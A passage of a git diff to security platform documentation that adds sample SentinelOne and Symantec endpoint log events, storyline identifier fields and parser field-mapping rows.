"real_user": { + "id": "1111", + "name": "aaaaaaaaa" + }, + "start": "2024-08-05T10:23:01.090000Z", + "title": "pparent", + "user": { + "id": "112", + "name": "aaaaaaaa" + }, + "working_directory": "/bin" + }, + "pid": 31304, + "real_user": { + "id": "1111", + "name": "aaaaaaaaa" + }, + "start": "2024-08-05T10:23:01.100000Z", + "title": "aaaaaaaaa", + "user": { + "id": "1111", + "name": "aaaaaaaa" + }, + "working_directory": "/usr" + }, + "related": { + "hash": [ + "0000000", + "aaaaaaaaaaaaaa" + ], + "user": [ + "aaaaaaaa" + ] + }, + "user": { + "name": "aaaaaaaa" + } + } + + ``` + + === "group_groupcreation.json" ```json @@ -834,6 +1288,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "dataset": "cloud-funnel-2.0" }, "@timestamp": "2023-03-30T15:35:43.346000Z", + "action": { + "properties": { + "Path": "C:\\Users\\john.doe\\Desktop\\test.reg" + } + }, "agent": { "version": "22.3.2.373" }, @@ -858,7 +1317,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha1": "8b3d7f4397dd79d66b753745a676da89439ed38e" }, "path": "C:\\Users\\john.doe\\Desktop\\test.reg" - } + }, + "parent": { + "storyline_id": "96BFE6E7AB538ED5" + }, + "storyline_id": "8EE6E6E7AB538ED5" } }, "host": { @@ -970,6 +1433,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "description": "Code injection to other process memory space during the target process' initialization MITRE: Defense Evasion {T1055.012}, Privilege Escalation {T1055.012}", "metadata": "To Process[ Name: \"msedge.exe\", Pid: \"8064\", UID: \"F328E6E7AB538ED5\", TrueContextID: \"2D1EE6E7AB538ED5\", IntegrityLevel: \"Low\", RelationToSource: \"Child\" ], File Path: \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"", "name": "PreloadInjection" + }, + "process": { + "parent": { + "storyline_id": "2D1EE6E7AB538ED5" + }, + "storyline_id": "2D1EE6E7AB538ED5" } }, "host": { @@ -1078,6 +1547,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "EE96E5E7AB538ED5" + }, + "storyline_id": "EE96E5E7AB538ED5" } }, "destination": { @@ -1207,6 +1682,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "0591E6E7AB538ED5" + }, + "storyline_id": "1B91E6E7AB538ED5" } }, "destination": { @@ -1336,6 +1817,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "B491E6E7AB538ED5" + }, + "storyline_id": "B491E6E7AB538ED5" } }, "destination": { @@ -1473,6 +1960,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "Debian GNU/11 (bullseye) 5.10.0-21-cloud-amd64" } + }, + "process": { + "parent": { + "storyline_id": "55a4cfe4-1718-2ae2-dc40-bc3f342f0eca" + }, + "storyline_id": "55a4d014-9141-dea7-0774-371da18a6469" } }, "host": { @@ -1596,6 +2089,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "Debian GNU/11 (bullseye) 5.10.0-21-cloud-amd64" } + }, + "process": { + "parent": { + "storyline_id": "55d21a32-95e8-7a56-ad57-a9e6aac5a7bd" + }, + "storyline_id": "55d21a33-24e0-2280-8049-e395c2fe0885" } }, "host": { @@ -1707,6 +2206,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "process": { + "parent": { + "storyline_id": "55d21a32-c658-5f3f-5d8f-57420736161e" + }, + "storyline_id": "55d21a32-c658-5f3f-5d8f-57420736161e", "target": { "command_line": " ip -6 -a -o address", "executable": "/usr/bin/ip", @@ -1714,6 +2217,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha1": "3c954614f2c9af7181e4d00e00ab4485e4a9c33f" }, "name": "ip", + "storyline_id": "55d21a32-c658-5f3f-5d8f-57420736161e", "title": "ip", "working_directory": "/usr/bin" } @@ -1848,7 +2352,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "add683a6910abbbf0e28b557fad0ba998166394932ae2aca069d9aa19ea8fe88" }, - "name": "svchost.exe" + "name": "svchost.exe", + "ossrc": { + "storyline_id": "4A96E5E7AB538ED5" + }, + "parent": { + "storyline_id": "4896E5E7AB538ED5" + }, + "storyline_id": "6196E5E7AB538ED5" } }, "host": { @@ -1992,7 +2503,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "add683a6910abbbf0e28b557fad0ba998166394932ae2aca069d9aa19ea8fe88" }, - "name": "svchost.exe" + "name": "svchost.exe", + "ossrc": { + "storyline_id": "AD36E7E7AB538ED5" + }, + "parent": { + "storyline_id": "AB36E7E7AB538ED5" + }, + "storyline_id": "C136E7E7AB538ED5" } }, "host": { @@ -2129,12 +2647,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha256": "20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50" }, "name": "backgroundTaskHost.exe", + "ossrc": { + "parent": { + "storyline_id": "5696E5E7AB538ED5" + }, + "storyline_id": "5696E5E7AB538ED5" + }, "parent": { "command_line": "sihost.exe", "executable": { "name": "C:\\Windows\\System32\\sihost.exe" - } + }, + "storyline_id": "BE98E5E7AB538ED5" }, + "storyline_id": "86B6E5E7AB538ED5", "target": { "command_line": "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding", "executable": "C:\\Windows\\System32\\RuntimeBroker.exe", @@ -2144,6 +2670,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha256": "e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628" }, "name": "RuntimeBroker.exe", + "storyline_id": "86B6E5E7AB538ED5", "title": "Runtime Broker", "working_directory": "C:\\Windows\\System32" } @@ -2261,6 +2788,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "14C2E6E7AB538ED5" + }, + "storyline_id": "14C2E6E7AB538ED5" } }, "host": { @@ -2379,6 +2912,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "B91AE6E7AB538ED5" + }, + "storyline_id": "B91AE6E7AB538ED5" } }, "host": { @@ -2505,7 +3044,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "a8b9b1d63b8340cb1292d8edcd2c70702d17e9a254ec4b215c844d5eefb949c9" }, - "name": "WaAppAgent.exe" + "name": "WaAppAgent.exe", + "ossrc": { + "storyline_id": "F31AE6E7AB538ED5" + }, + "parent": { + "storyline_id": "381AE6E7AB538ED5" + }, + "storyline_id": "B91AE6E7AB538ED5" } }, "host": { @@ -2623,6 +3169,21 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "381AE6E7AB538ED5" + }, + "storyline_id": "C21AE6E7AB538ED5" + }, + "registry": { + "old": { + "data": { + "strings": [ + "0x01D95E36B1CF068C" + ] + } + } } }, "host": { @@ -2749,7 +3310,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "3519db09c7d58615c5a5a8ef508e163e63ecb428f113021e0e3cd47fb7f39c9e" }, - "name": "mmc.exe" + "name": "mmc.exe", + "ossrc": { + "storyline_id": "4E1AE6E7AB538ED5" + }, + "parent": { + "storyline_id": "FA1CE6E7AB538ED5" + }, + "storyline_id": "5084E6E7AB538ED5" }, "scheduled_task": { "name": "\\Task John" @@ -2841,6 +3409,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "dataset": "cloud-funnel-2.0" }, "@timestamp": "2023-03-30T15:01:01.660000Z", + "action": { + "properties": { + "Path": "C:\\Windows\\System32\\pcasvc.dll" + } + }, "agent": { "version": "22.3.2.373" }, @@ -2873,7 +3446,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa" }, - "name": "rundll32.exe" + "name": "rundll32.exe", + "ossrc": { + "storyline_id": "1F91E6E7AB538ED5" + }, + "parent": { + "storyline_id": "4E1AE6E7AB538ED5" + }, + "storyline_id": "7322E6E7AB538ED5" }, "scheduled_task": { "name": "\\Microsoft\\Windows\\Application Experience\\PcaPatchDbTask" @@ -3005,6 +3585,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "F81CE6E7AB538ED5" + }, + "storyline_id": "FA1CE6E7AB538ED5" } }, "host": { @@ -3109,6 +3695,8 @@ The following table lists the fields that are extracted, normalized under the EC |`@timestamp` | `date` | Date/time when the event originated. | |`action.properties.IpAddress` | `keyword` | The type of the Logon | |`action.properties.LogonType_tmp` | `keyword` | The type of the Logon | +|`action.properties.Path` | `keyword` | | +|`action.properties.ScriptBlockText` | `keyword` | | |`action.properties.TargetDomainName` | `keyword` | | |`action.properties.TargetUserName` | `keyword` | | |`action.properties.TargetUserSid` | `keyword` | | @@ -3120,6 +3708,7 @@ The following table lists the fields that are extracted, normalized under the EC |`deepvisibility.driver.hash.sha256` | `keyword` | | |`deepvisibility.event.category` | `keyword` | | |`deepvisibility.event.type` | `keyword` | | +|`deepvisibility.file.old_path` | `keyword` | | |`deepvisibility.host.os.revision` | `keyword` | | |`deepvisibility.indicator.category` | `keyword` | | |`deepvisibility.indicator.description` | `keyword` | | @@ -3131,17 +3720,23 @@ The following table lists the fields that are extracted, normalized under the EC |`deepvisibility.process.executable.name` | `keyword` | | |`deepvisibility.process.hash.sha256` | `keyword` | | |`deepvisibility.process.name` | `keyword` | | +|`deepvisibility.process.ossrc.parent.storyline_id` | `keyword` | | +|`deepvisibility.process.ossrc.storyline_id` | `keyword` | | |`deepvisibility.process.parent.activecontent.path` | `keyword` | | |`deepvisibility.process.parent.command_line` | `keyword` | | |`deepvisibility.process.parent.executable.name` | `keyword` | | +|`deepvisibility.process.parent.storyline_id` | `keyword` | | +|`deepvisibility.process.storyline_id` | `keyword` | | |`deepvisibility.process.target.command_line` | `keyword` | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | |`deepvisibility.process.target.executable` | `keyword` | Absolute path to the process executable. | |`deepvisibility.process.target.hash.md5` | `keyword` | MD5 hash. | |`deepvisibility.process.target.hash.sha1` | `keyword` | SHA1 hash. | |`deepvisibility.process.target.hash.sha256` | `keyword` | SHA256 hash. | |`deepvisibility.process.target.name` | `keyword` | Process name. | +|`deepvisibility.process.target.storyline_id` | `keyword` | | |`deepvisibility.process.target.title` | `keyword` | | |`deepvisibility.process.target.working_directory` | `keyword` | The working directory of the process. | +|`deepvisibility.registry.old.data.strings` | `keyword` | | |`deepvisibility.scheduled_task.name` | `keyword` | Scheduled task name | |`deepvisibility.script.app_name` | `keyword` | | |`deepvisibility.script.content` | `keyword` | | diff --git a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md index a323e1fbde..470763a478 100644 --- a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md +++ b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md @@ -149,6 +149,138 @@ In this section, you will find examples of raw logs as generated natively by the +=== "commandscript_2" + + + ```json + { + "src.process.parent.isStorylineRoot": false, + "event.category": "command_script", + "tgt.file.modificationTime": -11644473600000, + "src.process.parent.image.sha1": "99ae9c73e9bee6f9c76d6f4093a9882df06832cf", + "site.id": "1470095163515336467", + "src.process.image.binaryIsExecutable": true, + "src.process.parent.displayName": "Windows Command Processor", + "src.process.user": "AUTORITE NT\\Syst\u00e8me", + "src.process.parent.subsystem": "SYS_WIN32", + "src.process.indicatorRansomwareCount": 0, + "src.process.crossProcessDupRemoteProcessHandleCount": 7, + "src.process.activeContent.signedStatus": "unsigned", + "src.process.tgtFileCreationCount": 0, + "src.process.indicatorInjectionCount": 0, + "src.process.moduleCount": 1800, + "i.version": "preprocess-lib-1.0", + "src.process.parent.name": "cmd.exe", + "src.process.activeContentType": "FILE", + "src.process.parent.activeContent.id": "3EFA3EFA3EFA3EFA", + "src.process.image.md5": "097ce5761c89434367598b34fe32893b", + "src.process.storyline.id": "7FABCCD60C10799B", + "src.process.indicatorReconnaissanceCount": 69, + "src.process.childProcCount": 6, + "mgmt.url": "euce1-sns-mssp.sentinelone.net", + "src.process.crossProcessOpenProcessCount": 0, + "cmdScript.isComplete": true, + "src.process.subsystem": "SYS_WIN32", + "meta.event.name": "SCRIPTS", + "src.process.parent.integrityLevel": "SYSTEM", + "src.process.indicatorExploitationCount": 0, + "src.process.parent.storyline.id": "7FABCCD60C10799B", + "tgt.file.creationTime": -11644473600000, + "src.process.integrityLevel": "SYSTEM", + "i.scheme": "edr", + "site.name": "Default site", + "src.process.netConnInCount": 0, + "event.time": 1722588221803, + "timestamp": "2024-08-02T08:43:41.803Z", + "account.id": "1470095162995242762", + "dataSource.name": "SentinelOne", + "endpoint.name": "ntrsql15", + "src.process.image.sha1": "044a0cf1f6bc478a7172bf207eef1e201a18ba02", + "tgt.file.size": 50105, + "cmdScript.applicationName": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.14393.0", + "src.process.isStorylineRoot": false, + "src.process.parent.image.path": "C:\\Windows\\System32\\cmd.exe", + "tgt.file.sha1": "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "dataSource.vendor": "SentinelOne", + "src.process.pid": 3744, + "src.process.parent.activeContent.hash": "1b11fdf894b9a205b690add505ff5f2193c1fe48", + "tgt.file.isSigned": "signed", + "src.process.cmdline": "powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 ", + "src.process.publisher": "MICROSOFT WINDOWS", + "dataSource.category": "security", + "src.process.crossProcessThreadCreateCount": 0, + "src.process.parent.isNative64Bit": false, + "src.process.parent.activeContentType": "CLI", + "src.process.parent.isRedirectCmdProcessor": false, + "src.process.parent.activeContent.path": "\\\\Unknown device\\Unknown file", + "src.process.crossProcessCount": 7, + "src.process.signedStatus": "signed", + "tgt.file.isExecutable": false, + "event.id": "01J4945B0JAAYZXWF8ZG4A0VMZ_638", + "src.process.parent.cmdline": "cmd /C \"powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 \"", + "cmdScript.content": "{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }", + "src.process.image.path": "C:\\Windows\\System32\\WINDOWSPOWERSHELL\\V1.0\\powershell.EXE", + "src.process.tgtFileModificationCount": 21, + "src.process.indicatorEvasionCount": 101, + "src.process.netConnOutCount": 0, + "cmdScript.sha256": "b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775", + "tgt.file.path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "tgt.file.extension": "ps1", + "src.process.crossProcessDupThreadHandleCount": 0, + "endpoint.os": "windows", + "src.process.tgtFileDeletionCount": 0, + "src.process.startTime": 1722588220577, + "mgmt.id": "16205", + "os.name": "Windows Server 2016 Standard", + "tgt.file.type": "UNKNOWN", + "src.process.activeContent.id": "B76839D30C10799B", + "src.process.displayName": "Windows PowerShell", + "src.process.activeContent.path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "src.process.isNative64Bit": false, + "src.process.parent.sessionId": 0, + "src.process.uid": "07AED4D60C10799B", + "src.process.parent.image.md5": "f4f684066175b77e0c3a000549d2922c", + "src.process.indicatorBootConfigurationUpdateCount": 0, + "src.process.indicatorInfostealerCount": 0, + "process.unique.key": "07AED4D60C10799B", + "cmdScript.originalSize": 140, + "agent.version": "23.4.4.223", + "src.process.parent.uid": "05AED4D60C10799B", + "src.process.parent.image.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "src.process.sessionId": 0, + "src.process.netConnCount": 0, + "mgmt.osRevision": "14393", + "group.id": "7FABCCD60C10799B", + "src.process.isRedirectCmdProcessor": false, + "src.process.verifiedStatus": "verified", + "src.process.parent.publisher": "MICROSOFT WINDOWS", + "src.process.parent.startTime": 1722588220333, + "src.process.dnsCount": 0, + "endpoint.type": "server", + "trace.id": "01J4945B0JAAYZXWF8ZG4A0VMZ", + "src.process.name": "powershell.EXE", + "agent.uuid": "f373bf5f3c5541a49aad49c5d39deac8", + "src.process.activeContent.hash": "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "src.process.image.sha256": "ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436", + "src.process.indicatorGeneralCount": 161, + "src.process.crossProcessOutOfStorylineCount": 1, + "packet.id": "C6BB63A4EEC044B7BFEDC8B39D2594AD", + "src.process.registryChangeCount": 0, + "src.process.indicatorPersistenceCount": 0, + "src.process.parent.signedStatus": "signed", + "src.process.parent.user": "AUTORITE NT\\Syst\u00e8me", + "tgt.file.id": "B76839D30C10799B", + "account.name": "S - SOCRAM BANQUE", + "event.type": "Command Script", + "task.path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "src.process.indicatorPostExploitationCount": 8, + "src.process.parent.activeContent.signedStatus": "unsigned", + "src.process.parent.pid": 3776 + } + ``` + + + === "dns_dnsresolved" @@ -326,6 +458,63 @@ In this section, you will find examples of raw logs as generated natively by the +=== "dns_macos" + + + ```json + { + "src.process.image.path": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper", + "src.process.subsystem": "SUBSYSTEM_UNKNOWN", + "src.process.parent.isStorylineRoot": true, + "event.category": "dns", + "src.process.parent.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "src.process.parent.image.sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "src.process.parent.storyline.id": "0A62D926-DFE7-4968-AA28-F0024BAC804D", + "src.process.isRedirectCmdProcessor": false, + "src.process.parent.publisher": "", + "src.process.parent.startTime": 1713167784335, + "endpoint.type": "laptop", + "endpoint.os": "osx", + "src.process.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "src.process.parent.displayName": "Google Chrome", + "src.process.name": "Google Chrome Helper", + "src.process.startTime": 1713167795818, + "agent.uuid": "75084C59-0F8A-479D-A9C4-2232C37D9D51", + "event.dns.response": "type: 5 edge-web-gew4.dual-gslb.spotify.com;2600:1901:1:4be::;", + "src.process.image.sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "src.process.user": "jdoe", + "timestamp": "2024-06-26T08:44:30.000Z", + "src.process.displayName": "Google Chrome Helper", + "endpoint.name": "MXY2XC6J7VJ", + "src.process.image.sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "event.dns.request": "type: 28 gew4-spclient.spotify.com", + "src.process.isStorylineRoot": false, + "src.process.parent.image.path": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "src.process.isNative64Bit": false, + "src.process.parent.sessionId": 0, + "src.process.uid": "CF37475F-BCA9-4F89-8A31-7B6C88CC6F1E", + "src.process.parent.image.md5": "68b329da9893e34099c7d8ad5cb9c940", + "src.process.parent.user": "psinha", + "src.process.pid": 1063, + "src.process.parent.name": "Google Chrome", + "src.process.cmdline": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=network --shared-files --field-trial-handle=1718379636,r,10310964397040083203,6939088771020272477,262144 --variations-seed-version=20240412-130119.249000 --seatbelt-client=25", + "src.process.publisher": "", + "src.process.parent.isNative64Bit": false, + "src.process.parent.isRedirectCmdProcessor": false, + "src.process.image.md5": "68b329da9893e34099c7d8ad5cb9c940", + "src.process.storyline.id": "0A62D926-DFE7-4968-AA28-F0024BAC804D", + "event.type": "DNS Resolved", + "agent.version": "24.1.2.7444", + "src.process.signedStatus": "signed", + "src.process.parent.image.sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "src.process.parent.cmdline": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "src.process.sessionId": 0, + "src.process.parent.pid": 790 + } + ``` + + + === "driver_driverload" @@ -851,6 +1040,122 @@ In this section, you will find examples of raw logs as generated natively by the +=== "fileoldpath" + + + ```json + { + "src.process.parent.isStorylineRoot": false, + "event.category": "file", + "src.process.parent.image.sha1": "0000000", + "site.id": "00000000", + "tgt.file.location": "Local", + "src.process.parent.displayName": "pparent", + "src.process.parent.subsystem": "SUBSYSTEM_UNKNOWN", + "src.process.indicatorRansomwareCount": 0, + "src.process.crossProcessDupRemoteProcessHandleCount": 0, + "src.process.tgtFileCreationCount": 1, + "src.process.indicatorInjectionCount": 0, + "src.process.moduleCount": 0, + "i.version": "preprocess-lib-1.0", + "src.process.parent.name": "pname", + "src.process.storyline.id": "00000-0000-0000-0000000", + "src.process.indicatorReconnaissanceCount": 0, + "src.process.childProcCount": 0, + "aaaa.url": "redacted.sentinelone.net", + "src.process.parent.eUserName": "aaaaaaaa", + "src.process.crossProcessOpenProcessCount": 0, + "src.process.eUserName": "aaaaaaaa", + "src.process.subsystem": "SUBSYSTEM_UNKNOWN", + "meta.event.name": "FILERENAME", + "src.process.parent.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "src.process.indicatorExploitationCount": 0, + "src.process.parent.storyline.id": "0000000-0000-0000-00000000", + "tgt.file.creationTime": 1722852662250, + "src.process.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "i.scheme": "edr", + "site.name": "sitename", + "src.process.netConnInCount": 0, + "event.time": 1722853381979, + "timestamp": "2024-08-05T10:23:01.979Z", + "account.id": "00000000000", + "dataSource.name": "SentinelOne", + "endpoint.name": "aaaaaaaaa", + "src.process.image.sha1": "aaaaaaaaaaaaaa", + "tgt.file.size": 750, + "src.process.isStorylineRoot": false, + "src.process.parent.image.path": "/bin/pparent", + "src.process.lUserName": "aaaaaaaa", + "dataSource.vendor": "SentinelOne", + "src.process.pid": 31304, + "tgt.file.isSigned": "unsigned", + "src.process.cmdline": " /usr/cmd -", + "dataSource.category": "security", + "src.process.crossProcessThreadCreateCount": 0, + "src.process.parent.isNative64Bit": false, + "src.process.parent.isRedirectCmdProcessor": false, + "src.process.parent.rUserUid": 1111, + "src.process.crossProcessCount": 0, + "src.process.signedStatus": "unsigned", + "event.id": "01J4H129Q4744MK0FX0CNXASK1_414", + "src.process.image.path": "/usr/path", + "src.process.tgtFileModificationCount": 2, + "src.process.indicatorEvasionCount": 0, + "src.process.netConnOutCount": 0, + "tgt.file.path": "/new/new/file/path/path", + "src.process.eUserUid": 1111, + "src.process.lUserUid": 1111, + "src.process.crossProcessDupThreadHandleCount": 0, + "endpoint.os": "linux", + "src.process.tgtFileDeletionCount": 0, + "src.process.startTime": 1722853381100, + "mgmt.id": "00000", + "os.name": "Linux", + "tgt.file.type": "UNKNOWN", + "src.process.displayName": "aaaaaaaaa", + "src.process.isNative64Bit": false, + "src.process.parent.sessionId": 0, + "src.process.rUserUid": 1111, + "src.process.uid": "000000000-0000-0000-00000000000", + "src.process.indicatorBootConfigurationUpdateCount": 0, + "src.process.indicatorInfostealerCount": 0, + "process.unique.key": "000000000-0000-0000-000000000", + "src.process.parent.eUserUid": 112, + "agent.version": "1", + "src.process.parent.uid": "000000000-0000-0000-0000000000000000", + "src.process.parent.rUserName": "aaaaaaaaa", + "src.process.sessionId": 0, + "src.process.netConnCount": 0, + "mgmt.osRevision": "Debian", + "group.id": "000000000-0000-0000-00000000", + "src.process.isRedirectCmdProcessor": false, + "src.process.parent.startTime": 1722853381090, + "src.process.dnsCount": 0, + "endpoint.type": "server", + "tgt.file.oldPath": "/old/path/name/tmp.aaaa", + "trace.id": "00000000000", + "src.process.rUserName": "aaaaaaaaa", + "src.process.name": "aaaaa", + "agent.uuid": "00000-0000-0000-000000", + "src.process.parent.lUserName": "aaaaaaaa", + "src.process.indicatorGeneralCount": 0, + "src.process.parent.lUserUid": 1111, + "src.process.crossProcessOutOfStorylineCount": 0, + "packet.id": "000000-0000-0000-000000000000", + "src.process.registryChangeCount": 0, + "src.process.indicatorPersistenceCount": 3, + "src.process.parent.signedStatus": "unsigned", + "tgt.file.id": "00000-0000-0000-0000000000", + "account.name": "account_name", + "event.type": "File Rename", + "task.path": "/var/aaa/aaa/aaaa/aaaa", + "src.process.indicatorPostExploitationCount": 0, + "src.process.parent.pid": 111111 + } + ``` + + + === "group_groupcreation" diff --git a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md index 1f04601f91..fa3dcc4928 100644 --- a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md +++ b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_activity_logs.json" @@ -185,6 +185,66 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_control_ready_2.json" + + ```json + + { + "message": "HOSTNAME,1.2.3.4,Continue,Le contr\u00f4le des applications et des p\u00e9riph\u00e9riques est pr\u00eat.,Syst\u00e8me,Begin: 2022-10-19 06:45:39,End Time: 2022-10-19 06:45:39,Rule: R\u00e8gle int\u00e9gr\u00e9e,0,SysPlant,0,SysPlant,Aucun(e),User Name: Aucun(e),Domain Name: DOMAIN,Action Type: ,File size (bytes): 0,Device ID:", + "event": { + "action": "Continue", + "category": [ + "process" + ], + "end": "2022-10-19T06:45:39Z", + "reason": "Le contr\u00f4le des applications et des p\u00e9riph\u00e9riques est pr\u00eat.", + "start": "2022-10-19T06:45:39Z", + "type": [ + "info" + ] + }, + "@timestamp": "2022-10-19T06:45:39Z", + "broadcom": { + "endpoint_protection": { + "server": { + "domain": "DOMAIN" + } + } + }, + "file": { + "size": 0 + }, + "host": { + "hostname": "HOSTNAME", + "ip": "1.2.3.4", + "name": "HOSTNAME" + }, + "observer": { + "product": "Symantec Endpoint Protection", + "vendor": "Broadcom" + }, + "process": { + "executable": "SysPlant", + "name": "SysPlant", + "pid": 0 + }, + "related": { + "hosts": [ + "HOSTNAME" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + === "test_liveupdate.json" ```json @@ -357,6 +417,92 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_malicious_scan_2.json" + + ```json + + { + "message": "VPNP02,Event Description: [SID: 32329] Audit: Malicious Scan Attempt 2 attaque d\u00e9tect\u00e9e mais pas bloqu\u00e9e. Chemin d\u2019application : SYSTEM,Event Type: ,Local Host IP: 1.2.3.4,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 5.6.7.8,Remote Host MAC: 000000000000,Outbound,TCP,,Begin: 2022-10-19 08:26:56,End Time: 2022-10-19 08:26:56,Occurrences: 1,Application: SYSTEM,Location: Par d\u00e9faut,User Name: none,Domain Name: ,Local Port: 443,Remote Port: 23203,CIDS Signature ID: 32329,CIDS Signature string: Audit: Malicious Scan Attempt 2,CIDS Signature SubID: 65536,Intrusion URL: http://9.10.11.12:443/,Intrusion Payload URL: ,SHA-256: 0000000000000000000000000000000000000000000000000000000000000000,MD-5: ,Intensive Protection Level: N/A,URL Risk: N/A,URL Category: N/A", + "event": { + "category": [ + "intrusion_detection" + ], + "end": "2022-10-19T08:26:56Z", + "reason": "Audit: Malicious Scan Attempt 2 attaque d\u00e9tect\u00e9e mais pas bloqu\u00e9e. Chemin d\u2019application : SYSTEM", + "start": "2022-10-19T08:26:56Z", + "type": [ + "info" + ] + }, + "@timestamp": "2022-10-19T08:26:56Z", + "broadcom": { + "endpoint_protection": { + "application": { + "name": "SYSTEM" + }, + "cids": { + "signature": { + "id": 32329, + "label": "Audit: Malicious Scan Attempt 2", + "sub_id": 65536 + } + } + } + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 23203 + }, + "host": { + "hostname": "VPNP02", + "ip": "1.2.3.4", + "name": "VPNP02" + }, + "network": { + "direction": "outbound", + "transport": "tcp" + }, + "observer": { + "product": "Symantec Endpoint Protection", + "vendor": "Broadcom" + }, + "related": { + "hosts": [ + "VPNP02" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 